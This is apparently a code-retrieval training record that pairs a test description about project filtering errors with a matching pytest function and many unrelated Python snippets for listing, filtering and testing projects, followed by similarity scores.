plone.api.portal.get_tool('portal_catalog')\n path = '{}/projects'.format('/'.join(plone.api.portal.get().getPhysicalPath()))\n query = dict(portal_type='Project', sort_on='sortable_title', path=path)\n result = list()\n for brain in catalog(**query):\n result.append((brain.getId, brain.Title))\n return result", "def projects(self):\n sql = \"\"\"SELECT project\n FROM barcodes.sample\n LEFT JOIN barcodes.project_sample_sets USING (sample_set_id)\n LEFT JOIN barcodes.project USING (project_id)\n WHERE sample_id = %s\n UNION\n SELECT project\n FROM barcodes.project_samples\n LEFT JOIN barcodes.project USING (project_id)\n WHERE sample_id = %s\n \"\"\"\n with pm.sql.TRN:\n pm.sql.TRN.add(sql, [self.id, self.id])\n projects = pm.sql.TRN.execute_fetchflatten()\n return None if not projects else projects", "def test_returns_limit_projects(self):\n # Arrange\n # Create and arrange test projects\n self.arrange_projects()\n # Act\n response = self.client.get(\n f\"{self.url}?limit=1\", headers={\"Authorization\": self.user_session_token}\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)", "def tasks_in_project(request, project):\n return project.task_set.filter(user=request.user).exclude(folder='trash')" ]
[ "0.740072", "0.7351347", "0.7287984", "0.7287984", "0.72771144", "0.72143286", "0.7165112", "0.71590155", "0.7144451", "0.7075294", "0.7046728", "0.7021743", "0.70181876", "0.69926757", "0.698769", "0.6950364", "0.6894256", "0.68472075", "0.6795028", "0.67938405", "0.6792199", "0.6790819", "0.6777117", "0.6760707", "0.67518044", "0.6746114", "0.6744328", "0.6696477", "0.66728646", "0.6671634", "0.6659477", "0.6656171", "0.66390216", "0.6622481", "0.6599618", "0.65928954", "0.65919966", "0.65817", "0.6575259", "0.65705585", "0.65633655", "0.6561332", "0.6558603", "0.65510863", "0.6542315", "0.65316695", "0.65068007", "0.650215", "0.64821005", "0.64722556", "0.64634764", "0.64629453", "0.64427775", "0.6423464", "0.64226055", "0.641437", "0.63965106", "0.63937485", "0.6371165", "0.636825", "0.63564813", "0.6355311", "0.6339037", "0.6334161", "0.6321628", "0.6315338", "0.6295609", "0.6294056", "0.62921757", "0.62894064", "0.628858", "0.6266074", "0.626088", "0.62158924", "0.6205308", "0.620243", "0.6199477", "0.6199272", "0.6199272", "0.6199085", "0.6198536", "0.6197399", "0.61773384", "0.6168974", "0.61686397", "0.61685675", "0.616341", "0.61527765", "0.6148813", "0.61446506", "0.614237", "0.6133948", "0.6131722", "0.6125794", "0.6112855", "0.61086726", "0.61044526", "0.6103823", "0.6097707", "0.60891527" ]
0.829477
0
fetchet.get_projects() should error if filter is invalid
def test_get_projects_throws_if_project_does_not_exist(fc: fetcher.Fetcher): with pytest.raises(exceptions.NotFoundError) as exc: fc.get_projects("BadProject") assert "An error occured while getting projects." in str(exc.value)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_projects_filters(fc: fetcher.Fetcher, test_project_name):\n projects = fc.get_projects(test_project_name)\n assert isinstance(projects, list)\n assert len(projects) == 1\n assert projects[0].name == test_project_name", "def _get_filtered_projects(filters):\n projects_itr = (projects_lib.get_filtered(f) for f in filters)\n return itertools.chain.from_iterable(projects_itr)", "def test_get_project_list_with_no_projects(self):\n result = get_project_list()\n self.assertQuerysetEqual(result['projects'].object_list, [])\n self.assertIsNone(result['tag'])\n self.assertFalse(result['filtered'])", "def test_get_projects(self):\n pass", "def filter_projects():\n with open('../results/01.crawling/01.project_ci_services.json', 'r') as infile:\n projects = json.load(infile)\n tr_projects = []\n for project, value in projects.items():\n if \"GitHub\" in value or \"Travis\" in value:\n tr_projects.append(project)\n return tr_projects", "def test_list_project_request(self):\n pass", "def test_list_projects(self):\n pass", "def test_list_projects(self):\n pass", "def test_get_projects_returns_projects(fc: fetcher.Fetcher):\n projects = fc.get_projects()\n assert isinstance(projects, list)\n assert isinstance(projects[0], models.Project)", "def _get_projects(filters):\n # First order the objects, so separate that out\n orders_query = [o for o in filters if o['type']=='order']\n # Filter objects next, so separate those out\n filters_query = [f for f in filters if f['type']=='filter']\n\n projects = Project.objects.all()\n # We need a dictonary to pass to Django's filter function\n query_dict = {}\n # Order the projects based on the ordering queries\n for orders in orders_query:\n projects = projects.order_by(orders['property'])\n # create the dictonary based on the filtering queries\n for filters in filters_query:\n # First, if we want to filter by user, find the user\n if filters['property'] =='user':\n try:\n user_p = UserProfile.objects.get(email=filters['value'])\n query_dict[filters['property']] = user_p\n except UserProfile.DoesNotExist:\n raise Http404(\"User does not exist\")\n # Second, if the filter is by tags, change the query phrase\n # to 'tags__tag_name' - this is because tags is a ManyToManyField\n # and we want to search by the tag_name property of Tag objects\n elif filters['property'] == 'tags':\n filters['property'] = 'tags__tag_name'\n query_dict[filters['property']] = filters['value']\n else:\n # Make a dictionary, property: value, and you can pass it to filter fn\n query_dict[filters['property']] = filters['value']\n projects = projects.filter(**query_dict)\n return projects", "def test_get_project_list_with_tag_filter(self):\n # Add test projects.\n tag = 'tag1'\n projects_with_tag = [\n add_project(title='1', description='1', tags=[tag]),\n add_project(title='2', description='2', tags=[tag]),\n ]\n project_without_tag = add_project(title='3', description='3', tags=[])\n\n result = get_project_list(tag=tag)\n result_projects = result['projects'].object_list\n\n # Make sure only projects with tag are retrieved.\n for project_with_tag in projects_with_tag:\n self.assertTrue(project_with_tag in result_projects)\n self.assertFalse(project_without_tag in result_projects)\n self.assertEqual(len(result_projects), len(projects_with_tag))\n self.assertTrue(result['filtered'])\n self.assertEqual(result['tag'], tag)", "def test_get_project_list_with_projects(self):\n # Add two test projects.\n projects = [\n add_project(title='1', description='1'),\n add_project(title='2', description='2'),\n ]\n\n result = get_project_list()\n result_projects = result['projects'].object_list\n\n # Make sure two test projects are retrieved.\n for project in projects:\n self.assertTrue(project in result_projects)\n self.assertEqual(len(result_projects), len(projects))\n self.assertIsNone(result['tag'])\n self.assertFalse(result['filtered'])", "def _get_projects(project_ids):\n if _ALL in project_ids:\n return projects_lib.get_all()\n return projects_lib.get_selective(project_ids)", "def test_list_project(self):\n pass", "def query_projects(request):\n try:\n filters = request.data\n except AttributeError:\n filters = FILTER\n projects = _get_projects(filters)\n projects_as_json = serializers.serialize('json', projects)\n return HttpResponse(json.dumps(projects_as_json), content_type='json')", "def project_view(request, project_id):\n\n # Retrieve the project to to be displayed. Raise an error if this project does not exist\n project = get_object_or_404(Projet, id=project_id)\n\n if request.method == 'GET':\n\n filters = Q()\n list_of_key = []\n query_string = request.META['QUERY_STRING']\n query_tab = query_string.split('&')\n filter_id_tab = []\n filter_dic = {}\n\n print(query_tab)\n\n if (query_tab != ['']):\n for query in query_tab:\n query_arg = query.split('=')\n id = query_arg[0]\n\n if not (id in filter_id_tab):\n filter_id_tab.append(id)\n try:\n filter_dic[id].append(query_arg[1])\n except KeyError:\n filter_dic[id] = [query_arg[1]]\n\n for key in request.GET:\n list_of_key.append(key)\n\n print(list_of_key)\n filters = creat_filters_rec(project, filter_dic, filter_id_tab)\n else:\n filters = Q()\n\n #\n # for key in filter_id_tab:\n #\n #\n # entry = filter_dic[key]\n #\n # if (len(entry) != 3):\n # continue\n #\n # filters = add_filter(filters, entry)\n\n tasks = project.task_set.filter(filters).order_by('-priority')\n else:\n # Retrieve all the task of the project and order them\n tasks = project.task_set.all().order_by('-priority')\n\n # Check if the logged in user is allowed to see this project\n if request.user.has_perm('taskmanager.{}_project_permission'.format(project.id)):\n status = Status.objects.all()\n users = project.members.all()\n return render(request, 'project.html', locals())\n else:\n return redirect(\"projects\")", "def test_get_past(self, rf, projects):\n # get queryset\n request = rf.get(\"/projects/my\")\n view = MyProjectListView()\n view.setup(request)\n view.dispatch(request)\n view.get_queryset()\n qs = view.get_past()\n\n # slavic working group grant ended so it is \"past\"\n assert projects[\"slavic\"] in qs\n assert projects[\"derrida\"] not in qs\n assert projects[\"pliny\"] not in qs\n assert projects[\"ocampo\"] not in qs", "def test_get_project_list_with_page_filter(self):\n # Add test projects.\n projects = [\n add_project(title=str(i), description=str(i)) for i in range(10)\n ]\n pages = {\n 1: projects[5:],\n 2: projects[:5],\n }\n\n # Check first page results.\n result = get_project_list(page=1)\n first_page_results = result['projects'].object_list\n for first_page_project in pages[1]:\n self.assertTrue(first_page_project in first_page_results)\n self.assertFalse(\n any(project in first_page_results for project in pages[2]))\n\n # Check second page results.\n result = get_project_list(page=2)\n second_page_results = result['projects'].object_list\n self.assertFalse(\n any(project in second_page_results for project in pages[1]))\n for second_page_project in pages[2]:\n self.assertTrue(second_page_project in second_page_results)", "def filter_projects(project_services):\n return [project for project, services in project_services.items() if \"Travis\" in services or \"GitHub\" in services]", "def project_filter(filename):\n return 'projects' in filename", "def test_returns_all_projects_if_difficulty_set_to_all(self):\n # Arrange\n self.test_project_2.private = False\n # Set difficulty of test_project_2 to easy.\n self.test_project_2.difficulty = ProjectDifficulty.EASY.value\n self.test_project_2.save()\n self.test_project_1.difficulty = ProjectDifficulty.MODERATE.value\n self.test_project_1.save()\n test_project_4 = Project.clone(self.test_project_2.id, self.test_author.id)\n test_project_4.status = ProjectStatus.PUBLISHED.value\n test_project_4.difficulty = ProjectDifficulty.CHALLENGING.value\n test_project_4.save()\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"difficulty\": \"ALL\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n # User is only permitted for test_project 1, 2 and 4, since test_project_3 is DRAFT.\n self.assertEqual(len(response.json[\"results\"]), 3)\n self.assertNotIn(\n self.test_project_3.id, [i[\"projectId\"] for i in response.json[\"results\"]]\n )", "def get_projects(selection):\n project=[]\n\n # project with keyname\n\n if 'project' in selection.facets:\n project+=selection.facets['project']\n\n\n # project without keyname\n\n # WARNING\n #\n # The code below uses sdinference and query the database to retrieve ESGF parameters.\n # Doing those things here may raise circular dependencies\n # as well as making the whole thing very complex.\n #\n # We do this to make this syntax work (i.e. project value without key)\n # synda search GeoMIP\n #\n # Note that this syntax always works (i.e. load the project level default file), even without this code.\n # synda search project=GeoMIP\n #\n #\n pending_projects=sdearlystreamutils.get_facet_values_early([selection.facets],'project',extract_item=True) # project without keyname or project as part of an identifier.\n\n li=pending_projects+project\n\n li=list(set(li)) # remove duplicate\n\n return li", "def filter_projects(self, query, check=True):\n page_projects = self._page_projects()\n\n page_projects.field_filter_projects.value = query\n page_projects.button_filter_projects.click()\n\n if check:\n\n def check_rows():\n is_present = False\n for row in page_projects.table_projects.rows:\n if not (row.is_present and\n query in row.link_project.value):\n break\n is_present = True\n\n return waiter.expect_that(is_present, equal_to(True))\n\n waiter.wait(check_rows,\n timeout_seconds=10,\n sleep_seconds=0.1)", "def test_get_projects_expanded(self):\n pass", "def get_project(abort_not_found=True, **project_filters):\n return get_resource(\n Project.query.filter_by(**project_filters), abort_not_found)", "def _get_resource_projects(resource):\n resource_type = resource.get('type', '').upper()\n resource_values = resource.get('include', tuple())\n\n projects = tuple()\n if resource_type == _FOLDER:\n projects = _get_folder_projects(resource_values)\n elif resource_type == _PROJECT:\n projects = _get_projects(resource_values)\n elif resource_type == _FILTER:\n projects = _get_filtered_projects(resource_values)\n else:\n logging.info('Projects: No projects for resource %s', resource_type)\n return projects", "def test_get_project(self):\n pass", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def get_projects(self, *criterion):\n from wkcdd.models.helpers import get_project_list\n return get_project_list([self.id], *criterion)", "def test_returns_projects_filter_by_mapping_types(self):\n # Arrange\n self.test_project_1.mapping_types = [MappingTypes.BUILDINGS.value]\n self.test_project_1.save()\n # Set project_2 to be allowed for all users removing as private.\n self.test_project_2.mapping_types = [MappingTypes.ROADS.value]\n self.test_project_2.private = False\n self.test_project_2.save()\n # Set mapping type of test_project_3 to waterways.\n self.test_project_3.mapping_types = [MappingTypes.WATERWAYS.value]\n self.test_project_3.status = ProjectStatus.PUBLISHED.value\n self.test_project_3.save()\n # Create a new project with other mapping type.\n\n test_project_4 = TestProjectsAllAPI.create_cloned_project_with_mapping_types(\n self.test_project_3.id, self.test_author.id, [MappingTypes.LAND_USE.value]\n )\n # Create a new project with land use mapping type.\n test_project_5 = TestProjectsAllAPI.create_cloned_project_with_mapping_types(\n self.test_project_3.id, self.test_author.id, [MappingTypes.OTHER.value]\n )\n # Create a new project with all mapping types.\n test_project_6 = TestProjectsAllAPI.create_cloned_project_with_mapping_types(\n self.test_project_3.id,\n self.test_author.id,\n [\n MappingTypes.BUILDINGS.value,\n MappingTypes.ROADS.value,\n MappingTypes.WATERWAYS.value,\n MappingTypes.LAND_USE.value,\n MappingTypes.OTHER.value,\n ],\n )\n\n # Act\n response_buildings = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.BUILDINGS.name]},\n )\n # Assert\n self.assertEqual(response_buildings.status_code, 200)\n self.assertEqual(len(response_buildings.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_buildings.json[\"results\"]],\n [self.test_project_1.id, test_project_6.id],\n )\n\n # Act\n response_roads = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.ROADS.name]},\n )\n # Assert\n self.assertEqual(response_roads.status_code, 200)\n self.assertEqual(len(response_roads.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_roads.json[\"results\"]],\n [self.test_project_2.id, test_project_6.id],\n )\n\n # Act\n response_waterways = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.WATERWAYS.name]},\n )\n # Assert\n self.assertEqual(response_waterways.status_code, 200)\n self.assertEqual(len(response_waterways.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_waterways.json[\"results\"]],\n [self.test_project_3.id, test_project_6.id],\n )\n\n # Act\n response_land_use = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.LAND_USE.name]},\n )\n # Assert\n self.assertEqual(response_land_use.status_code, 200)\n self.assertEqual(len(response_land_use.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_land_use.json[\"results\"]],\n [test_project_4.id, test_project_6.id],\n )\n\n # Act\n response_other = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.OTHER.name]},\n )\n # Assert\n self.assertEqual(response_other.status_code, 200)\n self.assertEqual(len(response_other.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_other.json[\"results\"]],\n [test_project_5.id, test_project_6.id],\n )\n\n # Test filter by multiple mapping types returns projects with any of the mapping types in the list.\n # Act\n response_all = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": \"BUILDINGS,ROADS,WATERWAYS,LAND_USE,OTHER\"},\n )\n # Assert\n self.assertEqual(response_all.status_code, 200)\n self.assertEqual(len(response_all.json[\"results\"]), 6)\n\n # Test mappingTypesExact returns only projects with exact mapping types.\n # Act\n response_exact = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": \"BUILDINGS\", \"mappingTypesExact\": \"true\"},\n )\n # Assert\n self.assertEqual(response_exact.status_code, 200)\n self.assertEqual(len(response_exact.json[\"results\"]), 1)\n self.assertEqual(\n response_exact.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def _get_projects(current_project_name):\n projects = []\n\n unique_project_changes = Change.objects.order_by().values(\n 'project_name').distinct()\n for change in unique_project_changes:\n projects.append(change['project_name'])\n\n # sort alphabetically\n projects.sort()\n\n # insert 'all' option as it should be present always\n projects.insert(0, PROJECT_ALL)\n\n # if current_project_name is valid, make it the first element in list so\n # that it shows up as selected in project choice drop down\n if current_project_name != PROJECT_ALL and current_project_name in projects:\n projects.remove(current_project_name)\n projects.insert(0, current_project_name)\n elif current_project_name != PROJECT_ALL:\n logging.error(\"Currently selected project %s not found in any changes.\"\n \" Removing from list.\", current_project_name)\n logging.debug(\"Returning list of projects: %r\", projects)\n return projects", "def test_get_current(self, rf, projects):\n # get queryset\n request = rf.get(\"/projects/my\")\n view = MyProjectListView()\n view.setup(request)\n view.dispatch(request)\n view.get_queryset()\n qs = view.get_current()\n\n # slavic working group grant ended so it is \"past\"\n assert projects[\"derrida\"] in qs\n assert projects[\"pliny\"] in qs\n assert projects[\"ocampo\"] in qs\n assert projects[\"slavic\"] not in qs", "def test_projects_get(self):\n response = self.client.open('/project-tracker/projects',\n method='GET')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def get_projects(self):\n projects = []\n page = 1\n while not len(projects) % 100:\n projects += self._get('/projects?{0}'.format(urllib.urlencode({'per_page': 100, 'page': page})))\n if not projects:\n break\n page += 1\n return projects", "def test_returns_limit_projects(self):\n # Arrange\n # Create and arrange test projects\n self.arrange_projects()\n # Act\n response = self.client.get(\n f\"{self.url}?limit=1\", headers={\"Authorization\": self.user_session_token}\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)", "def request_project_list(event_id):\n is_moar = bool(request.args.get('moar', type=bool))\n host_url = request.host_url\n return get_project_list(event_id, host_url, is_moar)", "def filter_queryset(self, request, queryset, view):\n user = request.user\n project_id = view.kwargs.get(view.lookup_field)\n\n if user.is_anonymous:\n return queryset.filter(Q(shared=True))\n\n if project_id:\n int_or_parse_error(\n project_id,\n \"Invalid value for project_id. It must be a positive integer.\",\n )\n\n # check if project is public and return it\n try:\n project = queryset.get(id=project_id)\n except ObjectDoesNotExist as non_existent_object:\n raise Http404 from non_existent_object\n\n if project.shared:\n return queryset.filter(Q(id=project_id))\n\n return super().filter_queryset(request, queryset, view)", "def test_get_projects(self):\n for project in ['TEST', 'NEWTEST', 'MYPROJECT']:\n self.db.insert_single_result(generate_mock_result(project=project))\n projects = self.db.get_projects()\n self.assertItemsEqual(['MYPROJECT', 'NEWTEST', 'TEST'], projects)", "def get_project_list(self, dummy_project):\n # TODO: domain scope 403 is probably to do with faulty keystone policy config -- revise?\n if not self._projects:\n self._projects = self._get_keystone_client(dummy_project).projects.list()\n\n return self._projects", "def db_projects():\n return [{\"name\": \"IT\"}, {\"name\": \"Financial\"}, {\"name\": \"Failed\"}]", "def list_projects():\n if '.wcscanner' not in os.listdir(context.__BASE_PATH__):\n return []\n return os.listdir(context.__PROJECTS_PATH__)", "def selectable_projects():\n\n db = current.db\n s3db = current.s3db\n\n # Lookup projects with provider self-registration\n ptable = s3db.project_project\n ttable = s3db.project_project_tag\n join = ttable.on((ttable.project_id == ptable.id) & \\\n (ttable.tag == \"APPLY\") & \\\n (ttable.value == \"Y\") & \\\n (ttable.deleted == False))\n query = (ptable.deleted == False)\n rows = db(query).select(ptable.id,\n ptable.name,\n join = join,\n )\n projects = {row.id: row.name for row in rows}\n return projects", "def projects(self, request, pk=None):\n\n obj = self.get_object()\n try:\n query = models.Project.objects.filter(\n subject=obj.subject,\n assign=obj\n )\n serializer = self.get_serializer(query, many=True)\n\n id = self.request.query_params.get('id')\n\n if id:\n query = get_object_or_404(\n models.Project,\n id=id,\n assign=obj\n )\n return self.filtering(request, query)\n\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def test_search_project(self):\n title = Project.search_project(\"dee\")\n self.assertTrue(len(title) > 0)", "def getProjectsQueryForEval(keys_only=False, ancestor=None, **properties):\n q = getProjectsQuery(keys_only, ancestor, **properties)\n q.filter('status IN', [project_model.STATUS_ACCEPTED, 'failed', 'completed'])\n return q", "def test_returns_all_projects_that_user_is_permitted_if_action_set_to_any(self):\n # Arrange\n self.test_project_2.private = False\n # Since test_author is BEGINNER, they can only map projects with mapping permission ANY.\n self.test_project_1.mapping_permission = MappingPermission.ANY.value\n self.test_project_1.save()\n self.test_project_2.mapping_permission = MappingPermission.ANY.value\n self.test_project_2.save()\n # Archive test_project_2 so that it is not returned if action set to any.\n test_project_4 = Project.clone(self.test_project_2.id, self.test_author.id)\n test_project_4.status = ProjectStatus.ARCHIVED.value\n # Validate all tasks of test_project_2 to check finished projects are not returned if action set to any.\n MappingService.map_all_tasks(self.test_project_2.id, self.test_author.id)\n ValidatorService.validate_all_tasks(self.test_project_2.id, self.test_author.id)\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"action\": \"any\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 2)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )\n self.assertEqual(\n response.json[\"results\"][1][\"projectId\"], self.test_project_2.id\n )", "def test_project_list_with_no_projects(self):\n response = self.client.get(reverse('portfolio:project_list'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'There are no portfolio projects.')", "def get_projects():\n return Project.query.all()", "def test_returns_projects_with_tasks_to_validate_if_action_set_to_validate(self):\n # Arrange\n self.test_project_2.private = False\n # Since test_author is BEGINNER, they can only validate projects with validation permission ANY.\n self.test_project_1.validation_permission = ValidationPermission.ANY.value\n self.test_project_1.save()\n self.test_project_2.validation_permission = ValidationPermission.ANY.value\n self.test_project_2.save()\n # Reset all tasks of test_project_2 so that there are no tasks ready to validate.\n MappingService.map_all_tasks(self.test_project_2.id, self.test_author.id)\n ValidatorService.validate_all_tasks(self.test_project_2.id, self.test_author.id)\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"action\": \"validate\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n # Test_project_2 has no tasks to validate, it should not be returned even when user has permsiion to validate.\n self.assertEqual(len(response.json[\"results\"]), 1)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def test_returns_private_projects_if_user_is_allowed(self):\n # Arrange\n # Create and arrange test projects\n project_1, project_2, project_3 = self.arrange_projects()\n project_3.private = True\n project_3.save()\n self.test_author.role = UserRole.ADMIN.value\n self.test_author.save()\n # Act\n response = self.client.get(\n self.url, headers={\"Authorization\": self.user_session_token}\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 3)\n returned_project_ids = sorted(\n [i[\"projectId\"] for i in response.json[\"results\"]]\n )\n self.assertEqual(\n returned_project_ids, [project_1.id, project_2.id, project_3.id]\n )", "def get_all_projects(self, org):\n return [proj for proj in Project.objects.filter(org=org)]", "def test_read_project(self):\n pass", "def test_read_project(self):\n pass", "def test_filter_with_plone3_query(self):\n portal = self.layer['portal']\n req = test_request()\n # Search.filter_query() will get SearchableText from form if not\n # passed in explicit query argument:\n req.form['SearchableText'] = 'jobs'\n req.form['Title'] = 'Human resource'\n req.form['Description'] = ''\n req.form['created'] = [DateTime('1970/02/01 00:00:00 GMT+0')]\n req.form['created_usage'] = 'range:min'\n req.form['submit'] = 'Search'\n view = getMultiAdapter((portal, req), name=u'search')\n res = view.results(batch=False)\n self.assertEqual([], [r for r in res])", "def get_projects(self):\n response = self.request(verb=requests.get, address=\"projects\")\n # FIXME: if no results, must we raise an exception?\n return response[\"results\"] if \"results\" in response else response", "def get_projects(self):\n unaligned_path = self.get_unaligned_path()\n logger.debug(\"collecting list of projects\")\n return [p for p in os.listdir(unaligned_path)\n if len(parsing.get_project_label(p))]", "def get_public_projects_query():\n return Q(access_policy=AccessPolicy.OPEN)", "def parse_one_project(self, args, project_arg):\n project = self.linguist_worktree.get_linguist_project(project_arg, raises=True)\n return [project]", "def getProjectsQueryForEvalForOrgs(org_keys):\n query = getProjectsQueryForOrgs(org_keys)\n query.filter(\n 'status IN', [project_model.STATUS_ACCEPTED, 'failed', 'completed'])\n return query", "def test_get_queryset(self, rf, projects):\n request = rf.get(\"/projects/my\")\n view = MyProjectListView()\n view.setup(request)\n view.dispatch(request)\n qs = view.get_queryset()\n\n # should be ordered by newest grant\n assert qs[0] == projects[\"derrida\"] # RPG started 1yr ago\n assert qs[1] == projects[\"pliny\"] # started 400 days ago\n assert qs[2] == projects[\"ocampo\"] # started 450 days ago\n assert qs[3] == projects[\"slavic\"] # seed grant 2yrs ago", "def test_returns_projects_filter_by_statuses(self):\n # Arrange\n self.test_project_1.status = ProjectStatus.DRAFT.value\n self.test_project_1.save()\n # Set project_2 to be allowed for all users removing as private.\n self.test_project_2.private = False\n self.test_project_2.save()\n # Set status of test_project_3 to archived.\n self.test_project_3.status = ProjectStatus.ARCHIVED.value\n self.test_project_3.save()\n\n # Act\n response_pub = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"projectStatuses\": [ProjectStatus.PUBLISHED.name]},\n )\n # Assert\n self.assertEqual(response_pub.status_code, 200)\n self.assertEqual(len(response_pub.json[\"results\"]), 1)\n self.assertEqual(\n response_pub.json[\"results\"][0][\"projectId\"], self.test_project_2.id\n )\n\n # Act\n response_draft = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"projectStatuses\": [ProjectStatus.DRAFT.name]},\n )\n # Assert\n self.assertEqual(response_draft.status_code, 200)\n self.assertEqual(len(response_draft.json[\"results\"]), 1)\n self.assertEqual(\n response_draft.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )\n\n # Act\n response_archived = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"projectStatuses\": [ProjectStatus.ARCHIVED.name]},\n )\n # Assert\n self.assertEqual(response_archived.status_code, 200)\n self.assertEqual(len(response_archived.json[\"results\"]), 1)\n self.assertEqual(\n response_archived.json[\"results\"][0][\"projectId\"], self.test_project_3.id\n )\n\n # Test multiple statuses returns all projects with those statuses.\n # Act\n response_all = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\n \"projectStatuses\": \"PUBLISHED,DRAFT,ARCHIVED\",\n },\n )\n # Assert\n self.assertEqual(response_all.status_code, 200)\n self.assertEqual(len(response_all.json[\"results\"]), 3)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_all.json[\"results\"]],\n [self.test_project_1.id, self.test_project_2.id, self.test_project_3.id],\n )", "def test_private_projects_are_not_returned_if_user_not_logged_in(self):\n # Arrange\n # Create and arrange test projects\n project_1, project_2, project_3 = self.arrange_projects()\n project_3.private = True\n project_3.save()\n # Act\n response = self.client.get(self.url)\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 2)\n self.assertEqual(response.json[\"results\"][0][\"projectId\"], project_2.id)\n self.assertEqual(response.json[\"results\"][1][\"projectId\"], project_1.id)", "def search_project_or_study(obj_type):\n\n matches = []\n response = None\n\n try:\n if obj_type not in set([\"projects\", \"studies\"]):\n raise Exception(\"Invalid object type specified\")\n\n possible_filters = filters_d[obj_type]\n \n for f in file_dict[obj_type][\"valid\"].values():\n json_file = data_dir + f\n json_s = open(json_file, \"r\").read()\n json_obj = json.loads(json_s)\n add_to_matches = True\n\n for filter_name in possible_filters:\n filter_val = request.args.get(filter_name)\n if filter_val:\n if json_obj[filter_name] != filter_val:\n add_to_matches = False\n \n if add_to_matches:\n matches.append(json_s)\n\n response_body = \"[\" + \",\".join(matches) + \"]\"\n response = get_response(response_body, status=200)\n\n except Exception as e:\n print(\"bad request\")\n response_body = '''{\"message\": \"invalid resource '%s'\"}''' % obj_type\n response = get_response(response_body, status=400)\n\n return response", "def test_get_models_throws_if_project_does_not_exist(\n fc: fetcher.Fetcher, project, model\n):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting projects.\" in str(exc.value)", "def test_project_list(self):\n rv = self.app.get(\"/\")\n self.assertIn(\"Assignment0\", rv.data)\n self.assertIn(\"Assignment1.0\", rv.data)\n self.assertIn(\"Assignment2.0\", rv.data)", "def get_projects(self, _is_simple=False):\n req_url = f\"{self.url}/projects\"\n if _is_simple:\n req_url += \"?simple=true\"\n ret = requests.get(req_url, headers = self.req_header)\n return ret.json()", "def test_get_projects(client, session, models, tokens):\n response = client.get(\n \"/projects\", headers={\"Authorization\": f\"Bearer {tokens['read']}\"}\n )\n assert response.status_code == 200\n assert len(response.json) > 0", "def multiple_projects():\n message = \"\"\"\nFound {} that match your change.\nSince there is no support for tracking changes in different\nprojects, try to add more attributes to focus on a specific change\nor set of changes.\n\"\"\".format(crayons.red(\"multiple different projects\"))\n return message", "def test_show_project_list(self):\n fake_project = FakeResource(1)\n\n # This mocks is faking keystone retrieving a defined list of\n # projects\n patch('identity.views.Keystone.project_list',\n Mock(return_value=[fake_project])).start()\n\n render_mock = patch(\n 'identity.views.ListProjectView.render_to_response').start()\n\n response = self.view(self.request)\n\n render_args = render_mock.call_args[0][0]\n computed = render_args['projects'][0]\n\n self.assertEqual(computed, fake_project.to_dict())", "def do_projects(self, arg):\n args = shlex.split(arg)\n limit = 10\n from_date = to_date = ''\n if args:\n limit = 0\n try:\n from_date, to_date = helpers.parse_date_parameters(args)\n except ValueError, msg:\n print(msg)\n return\n projects = self.db.get_projects_with_activity_field(\n from_date, to_date, limit=limit)\n refined = map(lambda x: [\n x['pid'], x['name'],\n '[Active]' if x['active'] else '[closed]',\n datetime.datetime.strftime(x['created'], '%c').decode('utf8'),\n x['description']], projects)\n print(tabulate(refined, ['ID', 'Project', 'Activity', 'Created',\n 'Description']))", "def get_jira_defects(project):\n return 